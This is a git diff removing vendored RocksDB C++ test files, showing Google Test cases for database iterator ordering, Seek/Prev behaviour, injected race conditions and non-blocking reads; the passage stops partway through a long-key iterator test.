-    internal_iter1_->Add("f", kTypeValue, "2", 5u);
-    internal_iter1_->Add("g", kTypeValue, "3", 7u);
-    internal_iter1_->Finish();
-
-    internal_iter2_ = new TestIterator(BytewiseComparator());
-    internal_iter2_->Add("a", kTypeValue, "4", 6u);
-    internal_iter2_->Add("b", kTypeValue, "5", 1u);
-    internal_iter2_->Add("c", kTypeValue, "6", 2u);
-    internal_iter2_->Add("d", kTypeValue, "7", 3u);
-    internal_iter2_->Finish();
-
-    std::vector<InternalIterator*> child_iters;
-    child_iters.push_back(internal_iter1_);
-    child_iters.push_back(internal_iter2_);
-    InternalKeyComparator icomp(BytewiseComparator());
-    InternalIterator* merge_iter =
-        NewMergingIterator(&icomp_, &child_iters[0], 2u);
-
-    db_iter_.reset(NewDBIterator(env_, ro_, ImmutableCFOptions(options_),
-                                 BytewiseComparator(), merge_iter,
-                                 8 /* read data earlier than seqId 8 */,
-                                 3 /* max iterators before reseek */));
-  }
-
-  Env* env_;
-  ReadOptions ro_;
-  Options options_;
-  TestIterator* internal_iter1_;
-  TestIterator* internal_iter2_;
-  InternalKeyComparator icomp_;
-  Iterator* merge_iter_;
-  std::unique_ptr<Iterator> db_iter_;
-};
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIterator1) {
-  db_iter_->SeekToFirst();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-  db_iter_->Next();
-  ASSERT_FALSE(db_iter_->Valid());
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIterator2) {
-  // Test Prev() when one child iterator is at its end.
-  db_iter_->SeekForPrev("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts a key in the end of the mem table after
-  // MergeIterator::Prev() realized the mem table iterator is at its end
-  // and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast",
-      [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts entries for update a key in the end of the
-  // mem table after MergeIterator::Prev() realized the mem tableiterator is at
-  // its end and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) {
-        internal_iter2_->Add("z", kTypeValue, "7", 12u);
-        internal_iter2_->Add("z", kTypeValue, "7", 11u);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) {
-  // Test Prev() when one child iterator is at its end but more rows
-  // are added and max_skipped is triggered.
-  db_iter_->Seek("f");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-
-  // Test call back inserts entries for update a key in the end of the
-  // mem table after MergeIterator::Prev() realized the mem table iterator is at
-  // its end and before an SeekToLast() is called.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) {
-        internal_iter2_->Add("z", kTypeValue, "7", 16u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 15u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 14u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 13u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 12u, true);
-        internal_iter2_->Add("z", kTypeValue, "7", 11u, true);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace4) {
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 14u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 13u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 12u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 11u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace5) {
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace6) {
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts an entry for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace7) {
-  internal_iter1_->Add("u", kTypeValue, "10", 4u);
-  internal_iter1_->Add("v", kTypeValue, "11", 4u);
-  internal_iter1_->Add("w", kTypeValue, "12", 4u);
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts entries for update a key before "z" in
-  // mem table after MergeIterator::Prev() calls mem table iterator's
-  // Seek() and before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 15u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 14u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 13u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 12u, true);
-          internal_iter2_->Add("x", kTypeValue, "7", 11u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace8) {
-  // internal_iter1_: a, f, g
-  // internal_iter2_: a, b, c, d, adding (z)
-  internal_iter2_->Add("z", kTypeValue, "9", 4u);
-
-  // Test Prev() when one child iterator has more rows inserted
-  // between Seek() and Prev() when changing directions.
-  db_iter_->Seek("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-
-  // Test call back inserts two keys before "z" in mem table after
-  // MergeIterator::Prev() calls mem table iterator's Seek() and
-  // before calling Prev()
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforePrev", [&](void* arg) {
-        IteratorWrapper* it = reinterpret_cast<IteratorWrapper*>(arg);
-        if (it->key().starts_with("z")) {
-          internal_iter2_->Add("x", kTypeValue, "7", 16u, true);
-          internal_iter2_->Add("y", kTypeValue, "7", 17u, true);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_iterator_test.cc b/thirdparty/rocksdb/db/db_iterator_test.cc
deleted file mode 100644
index d3bd164..0000000
--- a/thirdparty/rocksdb/db/db_iterator_test.cc
+++ /dev/null
@@ -1,1988 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/iostats_context.h"
-#include "rocksdb/perf_context.h"
-
-namespace rocksdb {
-
-class DBIteratorTest : public DBTestBase {
- public:
-  DBIteratorTest() : DBTestBase("/db_iterator_test") {}
-};
-
-class FlushBlockEveryKeyPolicy : public FlushBlockPolicy {
- public:
-  virtual bool Update(const Slice& key, const Slice& value) override {
-    if (!start_) {
-      start_ = true;
-      return false;
-    }
-    return true;
-  }
- private:
-  bool start_ = false;
-};
-
-class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory {
- public:
-  explicit FlushBlockEveryKeyPolicyFactory() {}
-
-  const char* Name() const override {
-    return "FlushBlockEveryKeyPolicyFactory";
-  }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-    const BlockBasedTableOptions& table_options,
-    const BlockBuilder& data_block_builder) const override {
-    return new FlushBlockEveryKeyPolicy;
-  }
-};
-
-TEST_F(DBIteratorTest, IteratorProperty) {
-  // The test needs to be changed if kPersistedTier is supported in iterator.
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "1", "2");
-  ReadOptions ropt;
-  ropt.pin_data = false;
-  {
-    unique_ptr<Iterator> iter(db_->NewIterator(ropt, handles_[1]));
-    iter->SeekToFirst();
-    std::string prop_value;
-    ASSERT_NOK(iter->GetProperty("non_existing.value", &prop_value));
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("0", prop_value);
-    iter->Next();
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("Iterator is not valid.", prop_value);
-  }
-  Close();
-}
-
-TEST_F(DBIteratorTest, PersistedTierOnIterator) {
-  // The test needs to be changed if kPersistedTier is supported in iterator.
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ReadOptions ropt;
-  ropt.read_tier = kPersistedTier;
-
-  auto* iter = db_->NewIterator(ropt, handles_[1]);
-  ASSERT_TRUE(iter->status().IsNotSupported());
-  delete iter;
-
-  std::vector<Iterator*> iters;
-  ASSERT_TRUE(db_->NewIterators(ropt, {handles_[1]}, &iters).IsNotSupported());
-  Close();
-}
-
-TEST_F(DBIteratorTest, NonBlockingIteration) {
-  do {
-    ReadOptions non_blocking_opts, regular_opts;
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    non_blocking_opts.read_tier = kBlockCacheTier;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // write one kv to the database.
-    ASSERT_OK(Put(1, "a", "b"));
-
-    // scan using non-blocking iterator. We should find it because
-    // it is in memtable.
-    Iterator* iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    int count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    delete iter;
-
-    // flush memtable to storage. Now, the key should not be in the
-    // memtable neither in the block cache.
-    ASSERT_OK(Flush(1));
-
-    // verify that a non-blocking iterator does not find any
-    // kvs. Neither does it do any IOs to storage.
-    uint64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    uint64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      count++;
-    }
-    ASSERT_EQ(count, 0);
-    ASSERT_TRUE(iter->status().IsIncomplete());
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // read in the specified block via a regular get
-    ASSERT_EQ(Get(1, "a"), "b");
-
-    // verify that we can find it via a non-blocking scan
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // This test verifies block cache behaviors, which is not used by plain
-    // table format.
-    // Exclude kHashCuckoo as it does not support iteration currently
-  } while (ChangeOptions(kSkipPlainTable | kSkipNoSeekToLast | kSkipHashCuckoo |
-                         kSkipMmapReads));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIteratorTest, ManagedNonBlockingIteration) {
-  do {
-    ReadOptions non_blocking_opts, regular_opts;
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    non_blocking_opts.read_tier = kBlockCacheTier;
-    non_blocking_opts.managed = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // write one kv to the database.
-    ASSERT_OK(Put(1, "a", "b"));
-
-    // scan using non-blocking iterator. We should find it because
-    // it is in memtable.
-    Iterator* iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    int count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    delete iter;
-
-    // flush memtable to storage. Now, the key should not be in the
-    // memtable neither in the block cache.
-    ASSERT_OK(Flush(1));
-
-    // verify that a non-blocking iterator does not find any
-    // kvs. Neither does it do any IOs to storage.
-    int64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    int64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      count++;
-    }
-    ASSERT_EQ(count, 0);
-    ASSERT_TRUE(iter->status().IsIncomplete());
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // read in the specified block via a regular get
-    ASSERT_EQ(Get(1, "a"), "b");
-
-    // verify that we can find it via a non-blocking scan
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    iter = db_->NewIterator(non_blocking_opts, handles_[1]);
-    count = 0;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(iter->status());
-      count++;
-    }
-    ASSERT_EQ(count, 1);
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-    delete iter;
-
-    // This test verifies block cache behaviors, which is not used by plain
-    // table format.
-    // Exclude kHashCuckoo as it does not support iteration currently
-  } while (ChangeOptions(kSkipPlainTable | kSkipNoSeekToLast | kSkipHashCuckoo |
-                         kSkipMmapReads));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBIteratorTest, IterSeekBeforePrev) {
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("0", "f"));
-  ASSERT_OK(Put("1", "h"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("2", "j"));
-  auto iter = db_->NewIterator(ReadOptions());
-  iter->Seek(Slice("c"));
-  iter->Prev();
-  iter->Seek(Slice("a"));
-  iter->Prev();
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSeekForPrevBeforeNext) {
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("0", "f"));
-  ASSERT_OK(Put("1", "h"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("2", "j"));
-  auto iter = db_->NewIterator(ReadOptions());
-  iter->SeekForPrev(Slice("0"));
-  iter->Next();
-  iter->SeekForPrev(Slice("1"));
-  iter->Next();
-  delete iter;
-}
-
-namespace {
-std::string MakeLongKey(size_t length, char c) {
-  return std::string(length, c);
-}
-}  // namespace
-
-TEST_F(DBIteratorTest, IterLongKeys) {
-  ASSERT_OK(Put(MakeLongKey(20, 0), "0"));
-  ASSERT_OK(Put(MakeLongKey(32, 2), "2"));
-  ASSERT_OK(Put("a", "b"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put(MakeLongKey(50, 1), "1"));
-  ASSERT_OK(Put(MakeLongKey(127, 3), "3"));
-  ASSERT_OK(Put(MakeLongKey(64, 4), "4"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  iter->Seek(MakeLongKey(20, 0));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(20, 0) + "->0");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(64, 4) + "->4");
-
-  iter->SeekForPrev(MakeLongKey(127, 3));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  delete iter;
-
-  iter = db_->NewIterator(ReadOptions());
